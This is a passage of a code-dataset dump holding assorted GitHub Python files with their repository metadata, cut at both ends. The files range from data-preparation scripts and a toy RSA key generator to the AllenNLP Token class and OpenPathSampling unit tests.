processed_data_path)\n","repo_name":"cdaksha/trading_agent","sub_path":"src/data/make_dataset.py","file_name":"make_dataset.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4335816741","text":"from utils.annotation_parsing import parse_pascal_voc_groundtruth, write_darknet_labels\nimport os\n\nLABEL_DIR='/home/nhat/darknet-finetune/IDOT_dataset/labels'\nIMG_DIR='/home/nhat/darknet-finetune/IDOT_dataset/images'\n\nif LABEL_DIR is None:\n LABEL_DIR = os.getcwd()\n\nframes = parse_pascal_voc_groundtruth('IDOT_dataset/xml')\nwrite_darknet_labels(LABEL_DIR, frames, ['vehicle', 'people'])\n\ntrain_set = open('IDOT_dataset/train_index.txt').read().splitlines()\ntest_set = 
open('IDOT_dataset/test_index.txt').read().splitlines()\nf_train = open('IDOT_dataset/train.txt', 'w')\nf_test = open('IDOT_dataset/test.txt', 'w')\n\nfor fn in train_set:\n f_train.write('{}\\n'.format(os.path.join(IMG_DIR, '{}.jpg'.format(fn))))\n\nfor fn in test_set:\n f_test.write('{}\\n'.format(os.path.join(IMG_DIR, '{}.jpg'.format(fn))))\n\nf_train.close()\nf_test.close()\n","repo_name":"minhnhat93/darkflow-finetune-IDOT_dataset","sub_path":"idot_scripts/create_idot_labels_for_darknet.py","file_name":"create_idot_labels_for_darknet.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"36649890904","text":"# Python modules\r\nimport pyodbc\r\nfrom app.controller.connectionString import return_conection_string\r\n# SQL operations on categories\r\nclass sCategorias: \r\n # constructor\r\n def __init__(self,nombre_Categoria=None,id_Categoria_Padre=None):\r\n self.__nombre_Categoria = None\r\n self.__id_Categoria_padre = None\r\n self.__constring = return_conection_string(argument='mssql', db_database='stupid_category')\r\n #self.__constring = connectionString().connectionODBC() # Connection to the database.\r\n pass\r\n\r\n # Fetches all of the product categories \r\n def SP_GET_CATEGORIES (self):\r\n conexion = pyodbc.connect(self.__constring,autocommit=True,timeout=10) # Tell it to close the connection automatically\r\n cursor = conexion.cursor()\r\n resultado = None\r\n with conexion:\r\n sentencia = \"EXEC SP_GET_CATEGORIES\"\r\n cursor.execute(sentencia)\r\n resultado = cursor.fetchall()\r\n # Iterate over the results and store them in an array\r\n array = [] # The array to return \r\n json = { }\r\n for row in resultado:\r\n \r\n json['id_Categoria'] = row.Categoria_id\r\n json['nombre_Categoria'] = row.nombre_Categoria\r\n json['level'] = row.level\r\n json['imagen'] = row.imagen\r\n array.append(json)\r\n json = {} \r\n return array\r\n ","repo_name":"jose55mase/servise_kiero_broco","sub_path":"app/services/scategorias.py","file_name":"scategorias.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"44871308382","text":"# Important information! The link below explains how to compile .py files into .exe\n# http://nikovit.ru/blog/samyy-prostoy-sposob-skompilirovat-python-fayl-v-exe/\n\nimport ProbabilityTest\nimport DivisionTest\n\n\n# main\ndef main():\n print('\\n')\n print(\"Program execution started\")\n while True:\n test_method = int(input(\"Enter the test name: \"))\n if test_method == 1:\n print(\"\\t\\v Fermat test\")\n test = ProbabilityTest.TestForNumbers()\n num = test.set_number()\n test.Ferma_test(num)\n elif test_method == 2:\n print(\"\\t\\v Rabin-Miller test\")\n test = ProbabilityTest.TestForNumbers()\n num = test.set_number()\n test_num = int(input('Enter the number of checks : '))\n test.RabinMiller_test(num, test_num)\n elif test_method == 3:\n print(\"\\t\\v Primality test\")\n DivisionTest.DivisionTest.division()\n else:\n break\n\n\n# end main\nif __name__ == '__main__':\n main()\n","repo_name":"SofiFairyTell/lw_2021","sub_path":"IB/lw_4/cypher_test.py","file_name":"cypher_test.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"3012796671","text":"from dataclasses import dataclass\nfrom typing import Optional\n\n\n@dataclass(init=False, repr=False)\nclass Token:\n \"\"\"\n A simple token representation, keeping track of the token's text, offset in the passage it was\n taken from, POS tag, dependency relation, and similar information. These fields match spacy's\n exactly, so we can just use a spacy token for this.\n\n # Parameters\n\n text : `str`, optional\n The original text represented by this token.\n idx : `int`, optional\n The character offset of this token into the tokenized passage.\n idx_end : `int`, optional\n The character offset one past the last character in the tokenized passage.\n lemma_ : `str`, optional\n The lemma of this token.\n pos_ : `str`, optional\n The coarse-grained part of speech of this token.\n tag_ : `str`, optional\n The fine-grained part of speech of this token.\n dep_ : `str`, optional\n The dependency relation for this token.\n ent_type_ : `str`, optional\n The entity type (i.e., the NER tag) for this token.\n text_id : `int`, optional\n If your tokenizer returns integers instead of strings (e.g., because you're doing byte\n encoding, or some hash-based embedding), set this with the integer. If this is set, we\n will bypass the vocabulary when indexing this token, regardless of whether `text` is also\n set. You can `also` set `text` with the original text, if you want, so that you can\n still use a character-level representation in addition to a hash-based word embedding.\n type_id : `int`, optional\n Token type id used by some pretrained language models like original BERT\n\n The other fields on `Token` follow the fields on spacy's `Token` object; this is one we\n added, similar to spacy's `lex_id`.\n \"\"\"\n\n __slots__ = [\n \"text\",\n \"idx\",\n \"idx_end\",\n \"lemma_\",\n \"pos_\",\n \"tag_\",\n \"dep_\",\n \"ent_type_\",\n \"text_id\",\n \"type_id\",\n ]\n # Defining the `__slots__` of this class is an optimization that dramatically reduces\n # the size in memory of a `Token` instance.
The downside of using `__slots__`\n # with a dataclass is that you can't assign default values at the class level,\n # which is why we need a custom `__init__` function that provides the default values.\n\n text: Optional[str]\n idx: Optional[int]\n idx_end: Optional[int]\n lemma_: Optional[str]\n pos_: Optional[str]\n tag_: Optional[str]\n dep_: Optional[str]\n ent_type_: Optional[str]\n text_id: Optional[int]\n type_id: Optional[int]\n\n def __init__(\n self,\n text: str = None,\n idx: int = None,\n idx_end: int = None,\n lemma_: str = None,\n pos_: str = None,\n tag_: str = None,\n dep_: str = None,\n ent_type_: str = None,\n text_id: int = None,\n type_id: int = None,\n ) -> None:\n assert text is None or isinstance(\n text, str\n ) # Some very hard to debug errors happen when this is not true.\n self.text = text\n self.idx = idx\n self.idx_end = idx_end\n self.lemma_ = lemma_\n self.pos_ = pos_\n self.tag_ = tag_\n self.dep_ = dep_\n self.ent_type_ = ent_type_\n self.text_id = text_id\n self.type_id = type_id\n\n def __str__(self):\n return self.text\n\n def __repr__(self):\n return self.__str__()\n\n def ensure_text(self) -> str:\n \"\"\"\n Return the `text` field, raising an exception if it's `None`.\n \"\"\"\n if self.text is None:\n raise ValueError(\"Unexpected null text for token\")\n else:\n return self.text\n\n\ndef show_token(token: Token) -> str:\n return (\n f\"{token.text} \"\n f\"(idx: {token.idx}) \"\n f\"(idx_end: {token.idx_end}) \"\n f\"(lemma: {token.lemma_}) \"\n f\"(pos: {token.pos_}) \"\n f\"(tag: {token.tag_}) \"\n f\"(dep: {token.dep_}) \"\n f\"(ent_type: {token.ent_type_}) \"\n f\"(text_id: {token.text_id}) \"\n f\"(type_id: {token.type_id}) \"\n )\n","repo_name":"allenai/allennlp","sub_path":"allennlp/data/tokenizers/token_class.py","file_name":"token_class.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":11609,"dataset":"github-code","pt":"78"} +{"seq_id":"25704466447","text":"import pandas_access as mdb\nfrom sqlalchemy import create_engine\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\n\naccess_files = [f for f in listdir(\"./data\") if isfile(join(\"./data\", f)) and os.path.splitext(f)[1] in ['.mdb', '.accdb]']]\n\nencoding_list = ['ascii', 'big5', 'big5hkscs', 'cp037', 'cp273', 'cp424', 'cp437', 'cp500', 'cp720', 'cp737'\n , 'cp775', 'cp850', 'cp852', 'cp855', 'cp856', 'cp857', 'cp858', 'cp860', 'cp861', 'cp862'\n , 'cp863', 'cp864', 'cp865', 'cp866', 'cp869', 'cp874', 'cp875', 'cp932', 'cp949', 'cp950'\n , 'cp1006', 'cp1026', 'cp1125', 'cp1140', 'cp1250', 'cp1251', 'cp1252', 'cp1253', 'cp1254'\n , 'cp1255', 'cp1256', 'cp1257', 'cp1258', 'euc_jp', 'euc_jis_2004', 'euc_jisx0213', 'euc_kr'\n , 'gb2312', 'gbk', 'gb18030', 'hz', 'iso2022_jp', 'iso2022_jp_1', 'iso2022_jp_2'\n , 'iso2022_jp_2004', 'iso2022_jp_3', 'iso2022_jp_ext', 'iso2022_kr', 'latin_1', 'iso8859_2'\n , 'iso8859_3', 'iso8859_4', 'iso8859_5', 'iso8859_6', 'iso8859_7', 'iso8859_8', 'iso8859_9'\n , 'iso8859_10', 'iso8859_11', 'iso8859_13', 'iso8859_14', 'iso8859_15', 'iso8859_16', 'johab'\n , 'koi8_r', 'koi8_t', 'koi8_u', 'kz1048', 'mac_cyrillic', 'mac_greek', 'mac_iceland', 'mac_latin2'\n , 'mac_roman', 'mac_turkish', 'ptcp154', 'shift_jis', 'shift_jis_2004', 'shift_jisx0213', 'utf_32'\n , 'utf_32_be', 'utf_32_le', 'utf_16', 'utf_16_be', 'utf_16_le', 'utf_7', 'utf_8', 'utf_8_sig']\n\nfor access_file in access_files:\n sqlite_file = join(\"./data\", os.path.splitext(access_file)[0]+'.sqlite')\n\n if 
os.path.isfile(sqlite_file):\n print(f\"file {sqlite_file} already exist!!! discarded\")\n continue\n\n engine = create_engine('sqlite:///{0}'.format(join(\"./data\", os.path.splitext(access_file)[0]+'.sqlite')), echo=False)\n tlist = [tbl for tbl in mdb.list_tables(join(\"./data\", access_file))]\n tables = {}\n\n for tbl in tlist:\n ok = False\n for encoding in encoding_list:\n try:\n table = mdb.read_table(join(\"./data\", access_file), tbl, encoding=encoding)\n tables[tbl] = table\n except:\n # print(f\"table {tbl} of database {access_file} discarded. could not be read ..\")\n continue\n print (f\"Good encoding for table {tbl}-{access_file} is {encoding}\")\n ok = True\n break\n\n if not ok:\n print(f\"table {tbl} of database {access_file} Could not be read ..\")\n\n\n for tab in tables:\n print(f\"table {tab} of DB {access_file} imported into DB {sqlite_file}\")\n tables[tab].to_sql(tab, con=engine)\n\n print(f\"file {sqlite_file} created\")\n","repo_name":"serioca/access2sqlite","sub_path":"scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39138108556","text":"import time\nimport picamera\nimport picamera.array\nimport numpy as np\nimport scipy \nimport scipy.misc\n\nimgArr=np.zeros((60, 3, 64, 64), dtype=np.uint8)\nwith picamera.PiCamera() as camera:\n with picamera.array.PiRGBArray(camera) as output:\n camera.resolution=(640, 480)\n \n for i, filename in enumerate(camera.capture_continuous(output, 'rgb', burst=True)) :\n #camera.capture(output, 'rgb')\n print('Captured %dx%d image' % (output.array.shape[1], output.array.shape[0]))\n img=output.array[:, 80:-80]\n output.truncate(0)\n img=scipy.misc.imresize(img, (64, 64), 'cubic', 'RGB').transpose(2, 0, 1)\n #print('%d %d %d' %(img.shape[0], img.shape[1], img.shape[2]))\n imgArr[i]=np.array(img, dtype=np.uint8)\n time.sleep(.01)\n if i==59: \n break\n np.savez('testfile', imgArr)\n","repo_name":"dvbuntu/autonomous","sub_path":"attic/picameratest2.py","file_name":"picameratest2.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"78"} +{"seq_id":"38198905949","text":"from datetime import datetime\r\nimport copy\r\nimport xlwt\r\nimport vcg\r\nimport pickle\r\n\r\n# 需要持久化数据的数量\r\ndata_num = 1000\r\n# 生成测试集还是训练集\r\n# 1为train训练集,0为test测试集\r\ntrain_flag = 0\r\n\r\n# 一组拍卖内部是否需要排序\r\nsort_flag = True\r\n\r\ndef loadDataFromFile(excel_path, x, y):\r\n print(\"load from file {0}\".format(excel_path))\r\n mydb = open(excel_path, 'rb')\r\n x_tmp = pickle.load(mydb)\r\n y_tmp = pickle.load(mydb)\r\n for ii in x_tmp:\r\n x.append(ii)\r\n for ii in y_tmp:\r\n y.append(ii)\r\n mydb.close()\r\n return len(x)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n file = xlwt.Workbook(encoding='utf-8')\r\n # 指定file以utf-8的格式打开\r\n sheet1 = file.add_sheet('vcg',cell_overwrite_ok=True)\r\n\r\n # 数据的配置\r\n config_data_name = [\"物品数\", \"买家数\", \"总拍卖数\"]\r\n config_data = [2, 9, data_num]\r\n for i in range(0, len(config_data)):\r\n sheet1.write(i, 0, config_data_name[i])\r\n sheet1.write(i, 1, config_data[i])\r\n\r\n # 生成模拟数据\r\n y = []\r\n x = []\r\n\r\n m = vcg.generateData(config_data[2], x, y, 0, sort_flag)\r\n\r\n # 指定标题\r\n head = ['序号']\r\n # 生成标题\r\n # 用户\r\n for i in range(config_data[1]):\r\n # 物品\r\n jj = 1< dict:\n \"\"\"Returns an object containing the subject and text and HTML versions of an email with the given template 
name\"\"\"\n if template_name == EmailTemplates.installer__welcomeEmail:\n return {\n 'subject': installer_welcome_email.subject,\n 'html': apply_params(installer_welcome_email.html, params, html=True),\n 'text': apply_params(installer_welcome_email.text, params)\n }\n","repo_name":"yashkumarsingh995/api_testing","sub_path":"mail/src/core/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13369261759","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[3]:\n\n\nimport numpy as np\n\n# univariate analysis to calc MSE (https://www.youtube.com/watch?v=uD1Dfz0aqkA_)\n# given values (i.e. marks scored by student) = total 70, mean 14\nY_true = [19,17,9,13,12] # = Y (original values)\n\n#calculated values\nY_pred = 14 # same as Y [14,14,14,14,14]\n\n# MSE (subtract each value from 14, sqaure them and add them)\nMSE = np.square(np.subtract(Y_true,Y_pred)).mean()\n\nprint (MSE)\n\n\n# In[5]:\n\n\n# we can do all above with formula using sklearn\nfrom sklearn.metrics import mean_squared_error\n# given values\nY_true = [19,17,9,13,12] \n# calculated values\n# can't use Y_pred = 14 , have to full list in sklearn\nY_pred = [14,14,14,14,14]\n\n#calc of MSE\nMSE = mean_squared_error (Y_true, Y_pred)\nprint (MSE)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"kealankelly/sharing-github","sub_path":"Understanding Mean squared error.py","file_name":"Understanding Mean squared error.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31904717461","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom standard_program import run_standard_program\nimport timeit\n\nsns.set(font_scale=2.0)\n\ndef wrapper(func, hypercolumns, minicolumns, epochs):\n def wrapped():\n return func(hypercolumns, minicolumns, epochs)\n return wrapped\n\nminicolumns_benchmark = True\nhypercolumns_benchmark = True\nepochs_benchmark = True\n\nif minicolumns_benchmark:\n # Minicolumns\n hypercolumns = 4\n minicolumns_range = np.arange(10, 100, 5)\n epochs = 1\n\n times_minicolumns = []\n for minicolumns in minicolumns_range:\n function = wrapper(run_standard_program, hypercolumns, minicolumns, epochs)\n time = timeit.timeit(function, number=1)\n times_minicolumns.append(time)\n\n # Plot\n fig = plt.figure(figsize=(16, 12))\n ax = fig.add_subplot(111)\n ax.plot(minicolumns_range, times_minicolumns, '*-', markersize=4)\n ax.set_xlabel('Minicolumns')\n ax.set_ylabel('Seconds that the program runed')\n\n# Hypercolumns\nif hypercolumns_benchmark:\n hypercolumns_range = np.arange(4, 20, 2)\n minicolumns = 20\n epochs = 1\n\n times_hypercolumns = []\n for hypercolumns in hypercolumns_range:\n function = wrapper(run_standard_program, hypercolumns, minicolumns, epochs)\n time = timeit.timeit(function, number=1)\n times_hypercolumns.append(time)\n\n # Plot\n sns.set(font_scale=2.0)\n fig = plt.figure(figsize=(16, 12))\n ax = fig.add_subplot(111)\n ax.plot(hypercolumns_range, times_hypercolumns, '*-', markersize=4)\n ax.set_xlabel('Hypercolumns')\n ax.set_ylabel('Seconds that the program runed')\n\n# Epochs\nif epochs_benchmark:\n hypercolumns = 4\n minicolumns = 20\n epochs_range = np.arange(1, 10, 1)\n\n times_epochs = []\n for epochs in epochs_range:\n function = wrapper(run_standard_program, hypercolumns, minicolumns, epochs)\n time = timeit.timeit(function, number=1)\n 
times_epochs.append(time)\n\n    # Plot\n    sns.set(font_scale=2.0)\n    fig = plt.figure(figsize=(16, 12))\n    ax = fig.add_subplot(111)\n    ax.plot(epochs_range, times_epochs, '*-', markersize=4)\n    ax.set_xlabel('Epochs')\n    ax.set_ylabel('Seconds the program ran')\n\nif minicolumns_benchmark and hypercolumns_benchmark and epochs_benchmark:\n    fig = plt.figure(figsize=(16, 12))\n    ax1 = fig.add_subplot(131)\n    ax2 = fig.add_subplot(132)\n    ax3 = fig.add_subplot(133)\n\n    ax1.plot(minicolumns_range, times_minicolumns, '*-', markersize=4)\n    ax2.plot(hypercolumns_range, times_hypercolumns, '*-', markersize=4)\n    ax3.plot(epochs_range, times_epochs, '*-', markersize=4)\n\n    ax1.set_title('Minicolumn scaling')\n    ax2.set_title('Hypercolumn scaling')\n    ax3.set_title('Epoch scaling')\n\n    ax1.set_ylabel('Time')\n\nif minicolumns_benchmark or hypercolumns_benchmark or epochs_benchmark:\n    plt.show()","repo_name":"h-mayorquin/attractor_sequences","sub_path":"benchmarking/standard_program_times.py","file_name":"standard_program_times.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} {"seq_id":"34341343672","text":"import argparse\nimport os\nimport math\nfrom collections import namedtuple\nfrom tqdm import tqdm\nfrom array import array\n\nfrom .utils import *\nfrom ..utils import *\n\n\ndef make_clickWeekday_clickHour():\n    global config\n    clickTimes = load_feature(os.path.join(config['features_dir'], 'raw', 'clickTime.npy'))\n    clickWeekday = np.empty(len(clickTimes), dtype=np.int32)\n    clickHour = np.empty(len(clickTimes), dtype=np.int32)\n    for i, clickTime in enumerate(clickTimes):\n        # clickTime is encoded as DDHHMM; integer division keeps the parts integral\n        dd, hh, mm = clickTime // 10000, clickTime // 100 % 100, clickTime % 100\n        clickWeekday[i] = dd % 7\n        clickHour[i] = hh\n    meta = {'type': 'numeric', 'dimension': 1}\n    dump_meta(os.path.join(config['features_dir'], 'extend', 'clickWeekday.meta.json'), meta)\n    dump_feature(os.path.join(config['features_dir'], 'extend', 'clickWeekday.pkl'), clickWeekday)\n    dump_meta(os.path.join(config['features_dir'], 'extend', 'clickHour.meta.json'), meta)\n    dump_feature(os.path.join(config['features_dir'], 'extend', 'clickHour.pkl'), clickHour)\n\n\ndef main():\n    global config\n    config = read_global_config()\n    actions = [\n        make_clickWeekday_clickHour,\n    ]\n\n    actions = {f.__name__: f for f in actions}\n    parser = argparse.ArgumentParser()\n    parser.add_argument('action', choices=list(actions.keys()))\n    args = parser.parse_args()\n    actions[args.action]()\n    print('done')\n\n\nmain()\n","repo_name":"abcdabcd987/tencent-ads-pcvr-contest","sub_path":"src/data/make_feature.py","file_name":"make_feature.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} {"seq_id":"14737366040","text":"#!/bin/python3\n\nimport string\nimport numpy as np\n\nsamples=['Here is your last hope.','But I am not sure if it will work.']\ncharacters=string.printable\ntoken_index=dict(zip(characters,range(1,len(characters)+1)))\nmax_length=50\nresults=np.zeros((len(samples),max_length,max(token_index.values())+1))\n
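\n# results has shape (num_samples, max_length, num_characters + 1); index 0 is\n# left unused so that character indices can start at 1.\n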
\nfor i,sample in enumerate(samples):\n\tfor j,character in enumerate(sample):\n\t\tindex=token_index.get(character)\n\t\tresults[i,j,index]=1.\n\n\n","repo_name":"gavin4396/python-for-tensorflow","sub_path":"one_hot_string.py","file_name":"one_hot_string.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"78"} {"seq_id":"40057335496","text":"#!/usr/bin/python\n\n# @Authors:\n#  Yosbi Antonio Alves Saenz (yosbito@gmail.com)\n\nimport random\nfrom random import randint\nimport math\nimport sys\n\n\ndef rabinMiller(n):\n    s = n - 1\n    t = 0\n    while s % 2 == 0:  # factor n - 1 as 2^t * s with s odd\n        s = s // 2\n        t += 1\n    k = 0\n    while k < 128:\n        a = random.randrange(2, n - 1)\n        v = pow(a, s, n)  # (num,exp,mod)\n        if v != 1:\n            i = 0\n            while v != (n - 1):\n                if i == t - 1:\n                    return False\n                else:\n                    i = i + 1\n                    v = (v ** 2) % n\n        k += 2\n    return True\n\n\ndef isPrime(n):\n    # testing only with rabinMiller\n    return rabinMiller(n)\n\n\ndef getPrime(l):\n    n = random.getrandbits(l)\n    if (n % 2 == 0):\n        n = n + 1\n    while (not (isPrime(n))):\n        n = n + 2\n    return n\n\n\n## 1 < e < phi(n) and gcd(e, phi(n)) = 1\ndef gete(phiDeN):\n    e = 0\n    if (phiDeN < 100000):\n        e = randint(2, phiDeN // 2)\n    else:\n        e = randint(2, 100000)\n    while True:\n        if gcd(e, phiDeN) == 1:\n            break\n        else:\n            e += 1\n    return e\n\n\n# Greatest common divisor\ndef gcd(a, b):\n    while b:\n        a, b = b, a % b\n    return a\n\n\n# using extended euclidean algorithm\n# d = e^(-1) (mod phi(n))\ndef getd(a, m):\n    g, x, y = egcd(a, m)\n    if g != 1:\n        return None\n    else:\n        return x % m\n\n\n# Extended greatest common divisor (for extended euclidean algorithm)\ndef egcd(a, b):\n    if a == 0:\n        return (b, 0, 1)\n    else:\n        g, y, x = egcd(b % a, a)\n        return (g, x - (b // a) * y, y)\n\n\ndef genRSAkey(L):\n    l = (L // 2)\n\n    p = getPrime(l)\n    if debug:\n        print(\"p generated:\")\n        print(p)\n\n    q = getPrime(l)\n    if debug:\n        print(\"q generated:\")\n        print(q)\n\n    n = p * q\n    if debug:\n        print(\"n generated\")\n        print(n)\n\n    phiDeN = (p - 1) * (q - 1)\n    if debug:\n        print(\"phi of n\")\n        print(phiDeN)\n\n    e = gete(phiDeN)\n    if debug:\n        print(\"e generated:\")\n        print(e)\n\n    d = getd(e, phiDeN)\n    if debug:\n        print(\"d generated:\")\n        print(d)\n\n    return (n, p, q, e, d)\n\n    # test\n    # m = 32\n\n    # c = (m**e) % n\n    # print \"the cryptogram:\"\n    # print c\n\n    # md = (c**d) % n\n    # print \"decrypted:\"\n    # print md\n\n\n# We can have the size of L either by args or by prompting the user\nL = 0\ndebug = True\nif (len(sys.argv) == 2):\n    L = int(sys.argv[1])\nelse:\n    L = int(input(\"Input the size of l \"))\n\ntuplo = genRSAkey(L)\n\nprint(\"result:\")\nprint(tuplo)\n","repo_name":"Yosbi/RSAKey-Generator","sub_path":"genRSAkey.py","file_name":"genRSAkey.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} {"seq_id":"29935656351","text":"from pymongo import MongoClient\nimport logging\nimport urllib\n\nfrom conf import config\n\nlogger = logging.getLogger('TweetCollector')\n\nclient = MongoClient(config.mongo_host, config.mongo_port)\ndb = client.pasta\ncollection = db.tweets\n\nclass Tweet:\n    def __init__(self, _id, created_ts, content, user, sentiment='pos'):\n        self.id = _id\n        self.created_ts = created_ts\n        self.content = content\n        self.sentiment = sentiment\n        self.user = user\n        self.url = urllib.quote('https://twitter.com/' + user + '/status/' + _id)\n        self.count = 0\n\n    \n    def dump(self):\n        logger.info('%s|%d|%s|%s' % (self.id, self.created_ts, self.content, 
self.sentiment))\n\n\n def save(self):\n sentiment = collection.find_one({\"id\": self.id}, {\"sentiment\": 1})\n #print sentimental\n if sentiment is None:\n self.count = self.count + 1;\n if self.count % 100 == 0: logger.info('Saved %d tweets.', self.count)\n self.dump()\n collection.insert(self.__dict__)","repo_name":"happyslowly/pasta","sub_path":"collector/Tweet.py","file_name":"Tweet.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34175386805","text":"from __future__ import division\nfrom __future__ import absolute_import\nfrom builtins import zip\nfrom builtins import range\nfrom past.utils import old_div\nfrom builtins import object\nimport pytest\nfrom numpy.testing import assert_array_almost_equal\nfrom .test_helpers import u\n\nimport openpathsampling as paths\nimport openpathsampling.engines as peng\nimport numpy as np\n\n\ntry:\n import openmmtools as omt\nexcept ImportError:\n omt = None\n\nimport openpathsampling.engines.openmm as omm_engine\n\nfrom openpathsampling.snapshot_modifier import *\n\nfrom collections import Counter\n\nimport logging\nlogging.getLogger('openpathsampling.initialization').setLevel(logging.CRITICAL)\nlogging.getLogger('openpathsampling.storage').setLevel(logging.CRITICAL)\nlogging.getLogger('openpathsampling.netcdfplus').setLevel(logging.CRITICAL)\n\n\nclass TestSnapshotModifier(object):\n def setup_method(self):\n # TODO OPS 2.0: This subclass is only here for python 2.7 should be\n # replaced with SnapshotModifier\n class DummyMod(SnapshotModifier):\n def __call__(self, a):\n return a\n self.Modifier = DummyMod\n self.modifier = DummyMod()\n self.snapshot_1D = peng.toy.Snapshot(\n coordinates=np.array([0.0, 1.0, 2.0, 3.0]),\n velocities=np.array([0.5, 1.5, 2.5, 3.5])\n )\n if paths.integration_tools.HAS_OPENMM:\n Class3D = peng.openmm.MDSnapshot\n else:\n Class3D = peng.toy.ToySnapshot\n self.snapshot_3D = Class3D(\n coordinates=np.array([[0.0, 0.1, 0.2],\n [1.0, 1.1, 1.2],\n [2.0, 2.1, 2.2],\n [3.0, 3.1, 3.2]]),\n velocities=np.array([[0.5, 0.6, 0.7],\n [1.5, 1.6, 1.7],\n [2.5, 2.6, 2.7],\n [3.5, 3.6, 3.7]])\n )\n\n def test_extract_subset(self):\n mod = self.Modifier(subset_mask=[1, 2])\n sub_1Dx = mod.extract_subset(self.snapshot_1D.coordinates)\n assert_array_almost_equal(sub_1Dx, np.array([1.0, 2.0]))\n sub_1Dv = mod.extract_subset(self.snapshot_1D.velocities)\n assert_array_almost_equal(sub_1Dv, np.array([1.5, 2.5]))\n\n sub_3Dx = mod.extract_subset(self.snapshot_3D.coordinates)\n assert_array_almost_equal(sub_3Dx, np.array([[1.0, 1.1, 1.2],\n [2.0, 2.1, 2.2]]))\n sub_3Dv = mod.extract_subset(self.snapshot_3D.velocities)\n assert_array_almost_equal(sub_3Dv, np.array([[1.5, 1.6, 1.7],\n [2.5, 2.6, 2.7]]))\n\n def test_apply_to_subset(self):\n mod = self.Modifier(subset_mask=[1, 2])\n copy_1Dx = self.snapshot_1D.coordinates.copy()\n new_1Dx = mod.apply_to_subset(copy_1Dx, np.array([-1.0, -2.0]))\n assert_array_almost_equal(new_1Dx, np.array([0.0, -1.0, -2.0, 3.0]))\n # and check that memory points to the right things; orig unchanged\n assert copy_1Dx is new_1Dx\n assert_array_almost_equal(self.snapshot_1D.coordinates,\n np.array([0.0, 1.0, 2.0, 3.0]))\n\n copy_3Dx = self.snapshot_3D.coordinates.copy()\n new_3Dx = mod.apply_to_subset(copy_3Dx,\n np.array([[-1.0, -1.1, -1.2],\n [-2.0, -2.1, -2.2]]))\n assert_array_almost_equal(new_3Dx, np.array([[0.0, 0.1, 0.2],\n [-1.0, -1.1, -1.2],\n [-2.0, -2.1, -2.2],\n [3.0, 3.1, 3.2]]))\n # and check 
that memory points to the right things; orig unchanged\n assert copy_3Dx is new_3Dx\n assert_array_almost_equal(self.snapshot_3D.coordinates,\n np.array([[0.0, 0.1, 0.2],\n [1.0, 1.1, 1.2],\n [2.0, 2.1, 2.2],\n [3.0, 3.1, 3.2]]))\n\n\nclass TestNoModification(TestSnapshotModifier):\n def setup_method(self):\n super(TestNoModification, self).setup_method()\n self.modifier = NoModification()\n\n def test_call(self):\n new_1D = self.modifier(self.snapshot_1D)\n assert_array_almost_equal(self.snapshot_1D.coordinates,\n new_1D.coordinates)\n assert_array_almost_equal(self.snapshot_1D.velocities,\n new_1D.velocities)\n new_3D = self.modifier(self.snapshot_3D)\n assert_array_almost_equal(self.snapshot_3D.coordinates,\n new_3D.coordinates)\n assert_array_almost_equal(self.snapshot_3D.velocities,\n new_3D.velocities)\n assert self.snapshot_1D.coordinates is not new_1D.coordinates\n assert self.snapshot_1D.velocities is not new_1D.velocities\n assert self.snapshot_3D.coordinates is not new_3D.coordinates\n assert self.snapshot_3D.velocities is not new_3D.velocities\n\n def test_call_no_copy(self):\n mod = NoModification(as_copy=False)\n new_1D = mod(self.snapshot_1D)\n assert new_1D is self.snapshot_1D\n new_3D = mod(self.snapshot_3D)\n assert new_3D is self.snapshot_3D\n\n def test_probability_ratio(self):\n # This should always return 1.0 even for invalid input\n assert self.modifier.probability_ratio(None, None) == 1.0\n\n\nclass TestRandomizeVelocities(object):\n def setup_method(self):\n # TODO: check against several possibilities, including various\n # combinations of shapes of velocities and masses.\n topology_2x3D = paths.engines.toy.Topology(\n n_spatial=3, n_atoms=2, masses=np.array([2.0, 3.0]), pes=None\n )\n topology_3x1D = paths.engines.toy.Topology(\n n_spatial=1, n_atoms=3, masses=np.array([[2.0], [3.0], [4.0]]),\n pes=None\n )\n topology_1x2D = paths.engines.toy.Topology(\n n_spatial=2, n_atoms=1, masses=np.array([1.0, 2.0]), pes=None\n )\n self.snap_2x3D = paths.engines.toy.Snapshot(\n coordinates=np.array([[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]),\n velocities=np.array([[0.0, 0.0, 0.0], [0.0, 0.0, 